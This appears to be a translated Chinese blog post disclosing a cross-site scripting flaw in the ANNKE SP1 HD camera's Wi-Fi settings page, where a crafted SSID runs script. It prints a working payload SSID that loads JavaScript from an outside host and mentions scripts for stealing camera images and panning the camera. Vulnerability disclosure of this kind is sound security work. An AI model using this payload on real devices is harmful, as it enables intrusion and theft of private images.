如何通过XSS入侵网络摄像头

  • 2019 年 11 月 20 日
  • 筆記

1

Start

我们在ANNKE SP1 HD无线摄像头(固件版本v3.4.1.1604071109)中发现了一个风险较低但十分有趣的XSS。有趣的是,在Annke Web界面中查看可用的Wi-Fi接入点时会触发XSS

因此,如果在摄像头的WIFI范围内有如下SSID:

"<script src=//xjs.io></script>

当受害者访问无线配置页面时,SP1相机将加载并运行在http://xjs.io/上的JavaScript代码。这是因为他扫描了附近的无线网络,并将能够连接的SSID直接显示在了页面上

2

如何利用

为了验证我们的想法,我们编写一个脚本来从相机中窃取图像。

利用XSS获取图像

官方可能已经修复了它,显然,人们现在需要开始关心物理接近利用这个问题,虽然它并不是一个巨大的漏洞。但它确实说明供应商需要小心验证来自任何源的输入,而不仅仅是Web界面上的GET/POST参数

3

做点更有趣的事情

如果你想做点更有意思的事,可以使用这个脚本https://github.com/pentestpartners/bits-for-blog/blob/master/annke-spin.js让摄像头进行平移

附上代码:

本文翻译自:

Nifty XSS in Annke SP1 HD wireless camera

作者:物联网IOT安全 (文章转载请注明来自:IT同路人论坛)

VirMach 便宜 VPS

QNews

QNews